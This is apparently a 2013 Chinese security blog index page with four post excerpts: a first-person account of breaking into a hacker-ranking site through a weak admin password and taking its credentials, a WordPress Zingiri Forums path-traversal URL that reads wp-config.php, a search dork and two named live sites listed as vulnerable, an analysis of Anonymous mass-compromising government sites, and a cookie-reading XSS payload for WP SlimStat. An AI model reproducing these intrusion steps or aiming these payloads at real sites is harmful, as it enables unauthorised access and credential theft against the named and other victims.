黑榜被日?简简单单日下黑客榜中榜

作者:Secer 发布时间:January 25, 2013 分类:渗透测试

简简单单日下黑客榜中榜

作者:Striker

QQ:954101430

Blog:http://strikersb.com/?p=52

正文:
其实我是看到Net user空间的日志了= 。= 于是手贱想试试,就有了下面的故事。

首先我看到网站,直接看了旁注,个人感觉主站没希望~
看到是Discuz直接进了uc_sever admin弱口令进去了= =。
clip_image001[1]

看了一下数据库,竟然不是root~ 他的服务器上只有两三个站,我还以为会是root呢 = =。

clip_image002[1]

果断改了一下管理员密码,

clip_image003[1]

果断拿到数据库的密码,虽然现在还没有用,先留着吧~

clip_image004[1]

看到这个,感觉插马拿shell是有希望了,于是信心满满~

clip_image005[1]

阅读剩余部分...

WordPress Zingiri Forums arbitrary file disclosure

作者:Secer 发布时间:January 25, 2013 分类:Web安全,原创文章

WordPress Forums插件'url'参数任意文件泄露漏洞的利用

参考:

WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/

Secunia Advisory SA50833
http://secunia.com/advisories/50833/

 

Analysis of vulnerability

The Zingiri Web Forums for WordPress writes our a header for the forum in forum.php through adding an action to wp_head.

44    add_action('wp_head','zing_forum_header'); 


686    function zing_forum_header()
687    {
688        global $zing_forum_content;
689        global $zing_forum_menu;
690        $output=zing_forum_output("content");
691     
692        zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
693        zing_integrator_cut($output,'<span class="forgot_password">','</span>');
694     
695        $zing_forum_content=$output;
696     
697        echo '<script type="text/javascript" language="javascript">';
698        echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
699        echo "var zing_forum_index='".get_option('home')."/index.php?';";
700        echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
701        echo '</script>';
702     
703        echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
704    } 


So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I’ve highlighted two areas:

456    function zing_forum_output($process) {
457        global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;
458     
459        $postVar=array();
460        switch ($process)
461        {
462            case "content":
463        if (isset($post)) $cf=get_post_custom($post->ID);
464        if (isset($_GET['zforum']))
465        {
466            $zing_forum_to_include=$_GET['zforum'];
467            $zing_forum_mode="forum";
468        } 


We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big else if statement. Here is the block of code that is executed if we set that to css:

541    } elseif ($zing_forum_to_include=='css') {
542            ob_end_clean();
543            if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
544            else $key=$_GET['url'];
545            if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546                $output=$_SESSION['ccforum']['stylesheet'][$key];
547            } else {
548                if (isset($_GET['stylesheet'])) {
549                    $http=zing_forum_http("mybb",'css.php',"");
550                    $news = new zHttpRequest($http,'zingiri-forum');
551                    if (!$news->curlInstalled()) return "cURL not installed";
552                    elseif (!$news->live()) return "A HTTP Error occured";
553                    $output=$news->DownloadToString();
554                    $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);
555     
556                } elseif ($_GET['url']) {
557                    $url=$_GET['url'];
558                    $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);
559                }
560                $f[]='/^body.*{(.*?)/';
561                $r[]=' {$1';
562                $f[]='/.zingbody/';
563                $r[]='';
564                $f[]='/(.*?).{(.*?)/';
565                $r[]='.ccforum $1 {$2';
566                $f[]='/(.*?),(.*?).{(.*?)/';
567                $r[]='$1,.ccforum $2 {$3';
568                $f[]='/(.*?),(.*?),(.*?).{(.*?)/';
569                $r[]='$1,$2,.ccforum $3 {$4';
570                $output=preg_replace($f,$r,$output,-1,$count);
571                if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
572            }
573            header("Content-type: text/css");
574            echo $output;
575            die();


If we don’t set anything expect the “url” get variable, we can cause it to be fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:

http://URL/wordpress/?zforum=css&url=../../../../../../wp-config.php

 

谷歌:inurl:plugins/zingiri-forum

躺枪列表:
http://themakeupmorgue.com/?zforum=css&url=../../../../../../wp-config.php
http://www.4newdesign.com/?zforum=css&url=../../../../../../wp-config.php
    

修复手法:

1.4.2版对比1.4.4版
557    $url=$_GET['url'];
修改为
555        $url=str_replace('..','',$_GET['url']);

过滤了“..”,不让跳上层目录。

黑客组织Anonymous疯狂入侵中国站点思路分析

作者:Secer 发布时间:January 22, 2013 分类:Web安全

关于匿名者组织的疯狂拿站和统一黑页显示时间的行为,相信大家已经见怪不怪了,但是当匿名者组织开始侵略中国网站的时候,相信大家都坐不住了。首先,个人感觉反击的意义何在,或者说究竟有没有意义,笔者不是哲学家,思想家,不做过多探讨。但是,知己知彼确实是必要的。笔者对前一段时间,国内地方GOV被疯狂秒杀的一次行动做了一次没什么技术含量的分析和猜想。

(以下敏感域名用WWW.XXX.COM略过)

首先,笔者登陆了FACEBOOK找寻了一些热议的话题:

(以下为GOOGLE翻译,英文不好,只好找谷大哥帮忙)

1.中国3000+政务工作网站 匿名者成功获取权限

2.匿名者再次攻击亚洲各国,宣传独立自由 在网络中

3.亚洲强国网络安全成为匿名者的击打目标。

以上是通过匿名者为关键字模糊搜索的热议转载,基本每个热议都指向匿名者发布新闻和预告信的推特,笔者只好继续翻阅防火长城登陆推特,观看了一些匿名者发布针对亚洲和其他洲的攻击成果发布,评论中充斥着各种赞扬与羡慕,当然不乏我国人士(最大的悲剧),当然,也有进行技术分析的人,有一条评论中带有这样一个域名:

www.xxseo.com(化名)

接着,笔者C段了一下:

IP:

XXX.XXX.XXX.200

XXX.XXX.XXX.201

XXX.XXX.XXX.202

XXX.XXX.XXX.203

XXX.XXX.XXX.204

XXX.XXX.XXX.205

``````````````````````````````

以上IP全部指向中国某省级机房

OK,就这个IP段开始旁站扫描,得到无数四级域名:

XXX.host1068.xxxseo.com.cn

XXX.host1079.xxxseo.com.cn

XXX.host1081.xxxseo.com.cn

XXX.host1083.xxxseo.com.cn

XXX.host1093.xxxseo.com.cn

XXX.host1099.xxxseo.com.cn

·····························

相信看到这里,大家应该明白了些什么,当然笔者还是打开验证了下

无一例外,全部是政务网站,各地GOV。

XXX.host1099.xxxseo.com.cn

都是IDC机房托管的分配四级域名,实际绑定是WWW.XXX.GOV.CN

笔者继续扫描旁站,并导出所有URL(四级域名)

将导出的列表批量经行绑定域名反查,得到实际绑定域名结果列表。

在工具经行这些自动化扫描导出的时候,笔者继续做着准备,将匿名者在推特发布的攻击我国站点的列表下载了一份,可以不是文本,图片质量又狂差,只能美图秀秀去个雾(不会PS的伤不起),勉强看清了URL。

准备工作做完,手上有两份列表,一份是扫描旁站得出的IDC C段的GOV站点 URL列表。另一份是匿名者发布的攻击我国站点公开列表。

然后笔者比对了一下,相信结果大家都猜到了。

IDC下的163个GOV站点,有112个在匿名者攻击列表中,当然匿名者公布了3000+个。

好的,对匿名者每次行动的印象让我立即从庞大组织的集体攻击,变成了组织性的批量拿站。

这个时候,笔者又有了另一个猜想,即使是批量攻击,整个C段也是要花时间的,于是笔者爬行了5个网站的目录,BINGO,全中,居然是一模一样的目录结构,好的,原来是一个公司的业务啊!统一的建站系统,统一的OA系统,统一的邮件系统,统一的VPN登陆远程办公系统,好吧,你赢了!

clip_image001

阅读剩余部分...

WordPress WP SlimStat 插件"s"脚本注入漏洞

作者:Secer 发布时间:January 22, 2013 分类:Web安全,原创文章

WordPress WP SlimStat是实时Web分析插件。 WordPress WP SlimStat 2.8.4及之前版本没有正确过滤wp-content/plugins/wp-slimstat/admin/view/panel1.php内index.php的 "s" 参数值,可被利用插入任意HTML和脚本代码。

 

查看版本:wordpress\wp-content\plugins\wp-slimstat\readme.txt

Stable tag: 2.8.4

利用方法如下:

前台搜索框提交XSS CODE:<script>alert(document.cookie);</script>

或URL:http://Target/wordpress/index.php?s=<script>alert(document.cookie);</script>

 

后台/wp-admin/index.php?page=wp-slimstat

image